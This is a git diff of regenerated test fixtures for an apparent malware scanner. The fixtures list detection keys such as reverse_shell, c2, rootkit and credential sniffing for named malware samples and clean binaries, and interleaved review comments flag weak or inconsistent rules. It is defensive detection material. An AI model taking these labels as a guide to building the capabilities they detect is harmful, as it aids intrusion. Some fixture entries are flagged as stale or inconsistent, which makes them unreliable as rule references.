@@ -9,6 +9,8 @@ data/compression/gzip: low
 data/encoding/base64: low
 data/encoding/reverse: low
 data/random/insecure: low
+discover/process/effective_groupid_get: medium
+discover/process/parent_pid_get: low
 discover/system/hostname_get: low
 discover/system/platform: low
 discover/user/USER: low
@@ -53,7 +55,5 @@ net/socket/send: low
 net/url/embedded: low
 net/url/encode: medium
 process/chroot: low
-process/effective_groupid_get: medium
 process/groupid_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/javascript/clean/securityDashboards.plugin.js.simple b/tests/javascript/clean/securityDashboards.plugin.js.simple
index 171f88260..726acf13c 100644
--- a/tests/javascript/clean/securityDashboards.plugin.js.simple
+++ b/tests/javascript/clean/securityDashboards.plugin.js.simple
@@ -26,7 +26,6 @@ impact/remote_access/heartbeat: medium
 impact/remote_access/implant: medium
 impact/remote_access/trojan: medium
 lateral/scan/brute_force: low
-lateral/scan/tool: medium
 net/download: medium
 net/http/form_upload: medium
 net/http/post: medium
diff --git a/tests/javascript/clean/zxcvbn.js.simple b/tests/javascript/clean/zxcvbn.js.simple
index e44886620..6d5f6c344 100644
--- a/tests/javascript/clean/zxcvbn.js.simple
+++ b/tests/javascript/clean/zxcvbn.js.simple
@@ -21,7 +21,6 @@ impact/remote_access/heartbeat: medium
 impact/remote_access/implant: medium
 impact/remote_access/trojan: medium
 lateral/scan/brute_force: low
-lateral/scan/tool: medium
 net/download: medium
 net/ip/multicast_send: low
 net/ip/spoof: medium
diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple
index c66a9ab9b..c637f8aae 100644
--- a/tests/linux/2021.FontOnLake/45E9.elf.simple
+++ b/tests/linux/2021.FontOnLake/45E9.elf.simple
@@ -16,7 +16,7 @@ discover/user/HOME: low
 discover/user/USER: low
 evasion/bypass_security/linux/pam: medium
 evasion/bypass_security/linux/se: medium
-evasion/file/location/tmp_x11_unix: low
+evasion/file/location/x11_unix: low
 evasion/file/prefix: medium
 evasion/file/prefix/proc: high
 evasion/logging/acct: low
@@ -63,7 +63,6 @@ impact/remote_access/reverse_shell: medium
 impact/remote_access/ssh: high
 impact/rootkit: critical
 impact/ui/x11_auth: medium
-lateral/scan/tool: medium
 malware/family/fontonlake: critical
 net/download: medium
 net/ip/spoof: medium
diff --git a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
index 7602a71ba..0bc855b82 100644
--- a/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
+++ b/tests/linux/2021.XMR-Stak/1b1a56.elf.simple
@@ -15,6 +15,7 @@ data/hash/blake2b: low
 data/hash/sha1: low
 data/random/insecure: low
 discover/network/interface_get: low
+discover/process/runtime_deps: medium
 discover/system/cpu_info: low
 discover/system/platform: low
 discover/system/sysinfo: medium
@@ -86,4 +87,3 @@ privesc/sudo: medium
 process/create: low
 process/multithreaded: low
 process/name_set: medium
-process/thread_local_storage: medium
diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
index 5905cae77..2c6aa011c 100644
--- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
+++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md @@ -4,6 +4,5 @@ |----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2022.bpfdoor/bpfdoor_2.simple b/tests/linux/2022.bpfdoor/bpfdoor_2.simple index 80d372626..0c0f91b34 100644 --- a/tests/linux/2022.bpfdoor/bpfdoor_2.simple +++ b/tests/linux/2022.bpfdoor/bpfdoor_2.simple @@ -1,7 +1,6 @@ # linux/2022.bpfdoor/bpfdoor_2: critical 3P/elastic/bpfdoor: critical credential/sniffer/pcap: high -evasion/file/location/tmp_x11_unix: low evasion/logging/hide_shell_history: high exec/program: medium exec/program/background: low diff --git a/tests/linux/2022.ez-pwnkit/payload.simple b/tests/linux/2022.ez-pwnkit/payload.simple index 5f6a0a3e8..944a8619e 100644 --- a/tests/linux/2022.ez-pwnkit/payload.simple +++ b/tests/linux/2022.ez-pwnkit/payload.simple 
@@ -20,7 +20,6 @@ impact/exploit/GCONV_PATH: high impact/exploit/cve: high impact/exploit/pwnkit: critical impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium net/dns: low net/dns/servers: low net/dns/txt: low diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md index 65dc88375..57f5fa934 100644 --- a/tests/linux/2023.ConnectBack/tiny.md +++ b/tests/linux/2023.ConnectBack/tiny.md @@ -4,6 +4,5 @@ |----------|---------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | HIGH | [anti-static/binary/tiny](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/tiny.yara#impossibly_small_elf_program) | ELF binary is unusually small | | -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple index 83d98a90b..10f71a219 100644 --- a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple +++ b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple @@ -15,6 +15,7 @@ fs/path/usr_sbin_telnetd: high fs/proc/net_route: high impact/ddos: critical impact/ddos/raw_flooder: medium +lateral/scan/tool: medium net/dns/servers: low net/http/fake_user_agent: medium net/ip/parse: medium 
diff --git a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple
index 77a248d51..457f20255 100644
--- a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple
+++ b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple
@@ -1,6 +1,7 @@
 # linux/2024.Beast/wyoming-xray-undress-robert: critical
 fs/path/dev: medium
 fs/path/tmp: medium
+hw/dev/ubi: low
 impact/ransom/linux: high
 impact/shutdown: medium
 lateral/vmware/vms: medium
diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
index e86abfca0..1e8293eaa 100644
--- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
+++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
@@ -53,7 +53,6 @@ impact/exploit/cve_list: medium
 impact/remote_access/kill_rm: medium
 impact/remote_access/reverse_shell: high
 impact/remote_access/systemctl: critical
-lateral/scan/tool: medium
 lateral/ssh/attack: high
 malware/family/kaiji: critical
 net/dns: low
diff --git a/tests/linux/2024.Mirai/ppc.simple b/tests/linux/2024.Mirai/ppc.simple
index fdf8eff46..63989f0ad 100644
--- a/tests/linux/2024.Mirai/ppc.simple
+++ b/tests/linux/2024.Mirai/ppc.simple
@@ -5,7 +5,6 @@ fs/proc/cpuinfo: medium
 fs/proc/stat: medium
 hw/cpu: medium
 impact/remote_access/router: high
-lateral/scan/tool: medium
 malware/family/mirai: critical
 net/ip/parse: medium
 net/socket/local_addr: low
diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
index adfdcbd45..27c58ccb8 100644
--- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
+++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
@@ -46,7 +46,6 @@ fs/permission/chown: medium
 fs/permission/modify: medium
 impact/ransom/note: high
 impact/remote_access/reverse_shell: medium
-lateral/scan/tool: medium
 net/dns: low
 net/dns/servers: low
 net/dns/txt: low
diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple
index ce62875f6..3c58b6b40 100644
--- a/tests/linux/2024.chisel/crondx.simple
+++ b/tests/linux/2024.chisel/crondx.simple
@@ -27,7 +27,6 @@ fs/path/etc_hosts: medium
 fs/path/etc_resolv.conf: low
 fs/permission/chown: medium
 fs/permission/modify: medium
-lateral/scan/tool: medium
 net/dns: low
 net/dns/servers: low
 net/dns/txt: low
diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
index f0e9223d4..a6f56798e 100644
--- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
+++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
@@ -44,7 +44,6 @@ fs/permission/chown: medium
 fs/permission/modify: medium
 impact/cryptojacking/nicehash_pool: high
 impact/cryptojacking/xmrig: high
-lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple
index 85fcb740d..2765835ac 100644
--- a/tests/linux/2024.gas/gas.simple
+++ b/tests/linux/2024.gas/gas.simple
@@ -28,7 +28,6 @@ hw/cpu: medium
 impact/exploit/GCONV_PATH: low
 impact/remote_access/dl_iterate: high
 impact/remote_access/reverse_shell: medium
-lateral/scan/tool: medium
 net/socket/send: low
 net/url/embedded: low
 process/create: low
diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json
index 457ebb356..3f5fcee65 100644
--- a/tests/linux/2024.kubo_injector/injector.json
+++ b/tests/linux/2024.kubo_injector/injector.json @@ -96,9 +96,9 @@ ], "RiskScore": 3, "RiskLevel": "HIGH", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_exe", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_s_exe", "ID": "fs/proc/pid_exe", - "RuleName": "proc_exe" + "RuleName": "proc_s_exe" }, { "Description": "access process memory maps", @@ -123,6 +123,17 @@ "ID": "fs/symlink_resolve", "RuleName": "realpath" }, + { + "Description": "expected ubi users", + "MatchStrings": [ + "Usage:" + ], + "RiskScore": 1, + "RiskLevel": "LOW", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users", + "ID": "hw/dev/ubi", + "RuleName": "expected_ubi_users" + }, { "Description": "Buffer overflow exploit", "MatchStrings": [ diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple index 580ffc3ed..0c30336b6 100644 --- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple +++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple @@ -6,7 +6,6 @@ anti-behavior/vm_check: medium c2/addr/http_dynamic: medium c2/addr/ip: medium -c2/addr/url: high c2/discovery/ip_dns_resolver: medium c2/tool_transfer/download: medium collect/archives/unarchive: medium @@ -104,7 +103,6 @@ impact/remote_access/kill_rm: medium impact/remote_access/net_exec: medium impact/remote_access/pseudo_terminal: medium impact/remote_access/reverse_shell: high -lateral/scan/tool: medium malware/family/emp3r0r: critical net/dns: low net/dns/over_https: medium diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple index 5abb9cf5a..4950c2eed 100644 --- a/tests/linux/2024.kworker_pretenders/gafgyt.simple +++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple 
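Review bot: The new `hw/dev/ubi` finding in this fixture is evidenced only by the string `Usage:`, a token present in nearly any command-line binary, so the `expected_ubi_users` rule it points at (outside this view) looks likely to fire on unrelated programs; the same key also shows up as a new hit on the Beast ransomware sample earlier in this patch. If the rule's condition is a single generic string, consider requiring a ubi-specific string alongside it so that even a LOW finding carries some signal. Separately, the emp3r0r.agent fixture on this same line loses `c2/addr/url: high`; unless that rule was intentionally retired elsewhere in the patch, that is a detection regression on a known agent sample worth a second look before the fixture is accepted.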
@@ -23,7 +23,6 @@ fs/path/usr_sbin: low
 fs/path/var: low
 fs/proc/arbitrary_pid: medium
 fs/proc/self_exe: medium
-lateral/scan/tool: medium
 net/dns/servers: low
 net/http/request: low
 net/socket/send: low
diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple
index fce1bdc25..3c878f390 100644
--- a/tests/linux/2024.medusa/rkload.simple
+++ b/tests/linux/2024.medusa/rkload.simple
@@ -8,7 +8,7 @@ discover/system/cpu_info: low
 discover/system/sysinfo: medium
 evasion/file/location/dev_shm: high
 evasion/file/location/lib: high
-evasion/file/location/system_directories: medium
+evasion/file/location/system_directory: medium
 evasion/file/prefix: high
 evasion/file/prefix/dev: critical
 evasion/file/prefix/lib: high
@@ -41,7 +41,6 @@ fs/tempdir/TMPDIR: low
 hw/cpu: medium
 impact/exploit/GCONV_PATH: low
 impact/remote_access/reverse_shell: medium
-lateral/scan/tool: medium
 malware/family/medusa: critical
 net/socket/local_addr: low
 net/socket/send: low
diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md
index 54b37428f..0b0edb9e0 100644
--- a/tests/linux/UPX/06ed158.md
+++ b/tests/linux/UPX/06ed158.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| -| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.2) | | +| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_2) | high entropy ELF binary (>7.4) | | | HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | | HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 0de75e3f4..5a9782f48 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -52,7 +52,6 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium -lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple index 9c9a4fa2a..19b37a061 100644 --- a/tests/linux/clean/busybox.simple +++ b/tests/linux/clean/busybox.simple 
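Review bot: The updated row now reads `high entropy ELF binary (>7.4)` while the rule anchor in the same row is still `normal_elf_high_entropy_7_2`, so the regenerated fixture documents a rule whose name and description disagree on the threshold. The rule itself is in rules/anti-static/elf/entropy.yara, outside this view, so I cannot tell whether the name or the description is the stale half; either rename the rule to match the new threshold or restore the `7_2` description, then regenerate this fixture so both agree. A name that advertises a different cutoff than the one that actually fires makes triage harder for anyone grepping the report for the threshold.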
@@ -10,6 +10,7 @@ data/random/insecure: low
 discover/group/lookup: medium
 discover/network/interface_get: low
 discover/network/netstat: medium
+discover/process/parent_pid_get: low
 discover/processes/pgrep: medium
 discover/system/cpu_info: low
 discover/system/platform: low
@@ -88,5 +89,4 @@ process/executable_path: low
 process/groupid_set: low
 process/groups_set: low
 process/namespace_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple
index b144dd59e..9970d0eed 100644
--- a/tests/linux/clean/caddy.simple
+++ b/tests/linux/clean/caddy.simple
@@ -38,6 +38,7 @@ discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
+discover/process/parent_pid_get: low
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: medium
@@ -147,6 +148,5 @@ persist/pid_file: medium
 privesc/sudo: medium
 process/chroot: low
 process/groups_set: low
-process/parent_pid_get: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple
index 8d70e7c8a..b0c8a3db3 100644
--- a/tests/linux/clean/chezmoi.simple
+++ b/tests/linux/clean/chezmoi.simple
@@ -46,6 +46,7 @@ data/hash/md5: low
 data/random/insecure: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
+discover/process/parent_pid_get: low
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: low
@@ -153,7 +154,6 @@ privesc/sudo: medium
 process/chdir: low
 process/chroot: low
 process/groups_set: low
-process/parent_pid_get: low
 sus/exclamation: medium
 sus/intercept: medium
 sus/malicious: medium
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index 202202cb5..bbd2dfbff 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -38,6 +38,9 @@ data/hash/sha1: low
 data/random/insecure: low
 discover/network/interface_list: medium
 discover/network/mac_address: medium
+discover/process/name_get: medium
+discover/process/parent_pid_get: low
+discover/process/runtime_deps: medium
 discover/processes/list: medium
 discover/system/hostname_get: low
 discover/system/platform: low
@@ -162,9 +165,6 @@ process/chroot: low
 process/create: low
 process/groups_set: low
 process/multithreaded: low
-process/name_get: medium
-process/parent_pid_get: low
-process/thread_local_storage: medium
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/clickhouse.simple b/tests/linux/clean/clickhouse.simple
index dc8a4d60e..4868ecd1d 100644
--- a/tests/linux/clean/clickhouse.simple
+++ b/tests/linux/clean/clickhouse.simple
@@ -45,6 +45,8 @@ discover/cloud/google_metadata: low
 discover/network/interface_get: low
 discover/network/interface_list: medium
 discover/permissions/capabilities: medium
+discover/process/name_get: medium
+discover/process/runtime_deps: medium
 discover/processes/list: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
@@ -181,8 +183,6 @@ process/create: low
 process/executable_path: low
 process/groupid_set: low
 process/multithreaded: low
-process/name_get: medium
-process/thread_local_storage: medium
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index 8b919a187..eede9cc16 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [http://arianna.libero.it/search/abin/integrata.cgi?query=](http://arianna.libero.it/search/abin/integrata.cgi?query=)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.goo.ne.jp/sgt.jsp?MT=](http://search.goo.ne.jp/sgt.jsp?MT=)
[http://search.goo.ne.jp/web.jsp?MT=](http://search.goo.ne.jp/web.jsp?MT=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://search.sweetim.com/search.asp?q=](http://search.sweetim.com/search.asp?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[http://start.sweetpacks.com/search.asp?q=](http://start.sweetpacks.com/search.asp?q=)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.goo.ne.jp/sgt.jsp?MT=](https://search.goo.ne.jp/sgt.jsp?MT=)
[https://search.goo.ne.jp/web.jsp?MT=](https://search.goo.ne.jp/web.jsp?MT=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[https://search.yahoo.com?fr=crmas_sfp](https://search.yahoo.com?fr=crmas_sfp)
[https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=](https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=) | | MEDIUM | [3P/threat_hunting/google_remote_desktop](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Google_Remote_Desktop_greyware_tool_keyword) | [references 'Google Remote Desktop' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [inomeogfingihgjfjlpeplalcfajhgai](https://github.com/search?q=inomeogfingihgjfjlpeplalcfajhgai&type=code) | | MEDIUM | [3P/threat_hunting/proxmark](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#Proxmark_offensive_tool_keyword) | [references 'Proxmark' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [ProxMark](https://github.com/search?q=ProxMark&type=code) | | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | Checks if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | @@ -26,6 +26,8 @@ | MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[h0dHBzOi8v::$https](https://github.com/search?q=h0dHBzOi8v%3A%3A%24https&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | +| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | @@ -59,7 +61,7 @@ | MEDIUM | [impact/ransom/decryptor](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ransom/decryptor.yara#decryptor) | References 'decryptor' | [decryptor](https://github.com/search?q=decryptor&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) | | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
